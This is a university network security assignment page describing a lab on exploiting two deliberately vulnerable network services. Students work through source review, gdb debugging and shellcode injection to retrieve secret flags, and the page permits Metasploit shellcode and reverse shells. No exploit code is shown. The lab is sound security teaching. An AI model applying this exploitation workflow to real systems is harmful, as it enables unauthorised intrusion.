CS 4740 / CS 6740 - Project 2

CS 4740 / CS 6740 - Network Security

Project 2: Remote Memory Exploits, Part 1

This project is due at 11:59pm on March 17, 2015.

Description

In this assignment your goal is to exploit two network services that we have setup for you. Each network service is different, and each includes a specific, exploitable vulnerability that you will need to identify. Once you have identified these vulnerabilities, you will need to construct programs that deliver malicious payloads to each service, triggering and exploiting the vulnerabilities.

The Servers

There are two services running on guldendraak.ccs.neu.edu that you will need to attack. These services and their ports are:

The archives linked above contain the source code and build scripts for these services. The exact binaries that are running on Guldendraak are also provided in the archives. Both services are compiled as 32-bit executables without stack protection (-fno-stack-protector), and both are statically linked with libraries. Both services are executing with ASLR disabled.

Secret Flags

Each service is running in a directory that includes a secret flag. After you have exploited each service you must collect the corresponding secret flag.

How to Approach This Assignment

For those of you who have never done any exploitation before, this assignment may seem daunting. I would suggest the following approach to tackling each service:

Start by downloading the source code for the service, and understanding what it is doing. Write a simple client that is able to interact with the service.
Re-examine the source code for the service and identify the exploitable bug, as well as any preconditions necessary to trigger the bug. The source code may also contain countermeasures that hinder exploitation that you should identify and devise workarounds for. Disassembling the server software (e.g. with objdump) will be useful during this stage.
Begin developing a program to exploit the server. Start by modifying your client to trigger the bug in the server, with the goal of crashing the server process. It may be useful to run a copy of the server on your own machine and inspect it with gdb to assess the success of your exploit.
Once you have a client that can reliably trigger the bug, improve your exploit by injecting shellcode into the service. Again, you can use gdb to inspect a local copy of the service to help debug this process. However, note that the stack frame offsets of the service running under gdb will not be the same as the stack offsets when the service is run stand-alone.
Finally, launch your attack against the remote service on Guldendraak. Keep in mind that your ultimate goal is to collect the secret flag, so design your shellcode appropriately.

Accessibility

For security reasons, the services in Guldendraak only accept TCP connections from machines in the Khoury College network. Thus, you must be physically present on campus, tunneled/VPNed to campus, or SSHed into a Khoury College machine in order to access the services.

What You Need to Turn In

To receive credit on this assignment, you will need to turn in all your code, as well as a file named secrets.json that contains the following JSON formatted data:

{
    "service1_secret": "secret flag from the echo server, as a string",
    "service2_secret": "secret flag from the message server, as a string"
}

You can use the following Python commands to test whether your file is valid JSON:

% python
>>> import json
>>> s = json.loads(open('secrets.json').read())
>>> print isinstance(s["service1_secret"], basestring)
>>> print isinstance(s["service2_secret"], basestring)

If you see an exception, then your file is not formatted correctly (or your file couldn't be found).

Language and Libraries

You can write your code in whatever language you choose, as long as your code compiles and runs on unmodified Khoury College Linux machines on the command line. Do not use libraries that are not installed by default on the Khoury College Linux machines. Similarly, your code must compile and run on the command line. You may use IDEs (e.g. Eclipse) during development, but do not turn in your IDE project without a Makefile. Make sure you code has no dependencies on your IDE.

Shellcode

You may use any shellcode that you wish during this assignment. You may use tools such as Metasploit to help you construct shellcode. If you use shellcode from the Web, you must cite the source of this code. You may use any style of exploit payload that you wish (e.g. command injection, reverse shell, etc.).

Submitting Your Project

If you have not done so already, register yourself for our grading system using the following command:

$ /course/cs6740sp15/bin/register-student [NUID]

NUID is your Northeastern ID number, including any leading zeroes.

Before turning in your project, you and your partner(s) must register your group. To register yourself in a group, execute the following script:

$ /course/cs6740sp15/bin/register project2 [team name]

This will either report back success or will give you an error message. If you have trouble registering, please contact the course staff. You and your partner(s) must all run this script with the same [team name]. This is how we know you are part of the same group.

To turn-in your project, you must submit your code along with a file named secrets.json that contains the secrets obtained from exploiting the services. Your secrets.json file and source code should all be placed in a directory. You submit your project by running the turn-in script as follows:

$ /course/cs6740sp15/bin/turnin project2 [project directory]

[project directory] is the name of the directory with your submission. The script will print out every file that you are submitting, so make sure that it prints out all of the files you wish to submit! The turn-in script will not accept submissions that are missing the secrets.json file. Only one group member needs to submit your project. Your group may submit as many times as you wish; only the last submission will be graded, and the time of the last submission will determine whether your assignment is late.

Grading

This project is worth 13 points. If you submit the correct secret flags then you will receive full credit. We will randomly check student's code to make sure that it works correctly. All student code will be scanned by plagarism detection software to ensure that students are not copying code from the Internet or each other. Students who are caught cheating will receive a zero on the assignment, and will be reported to OSCCR.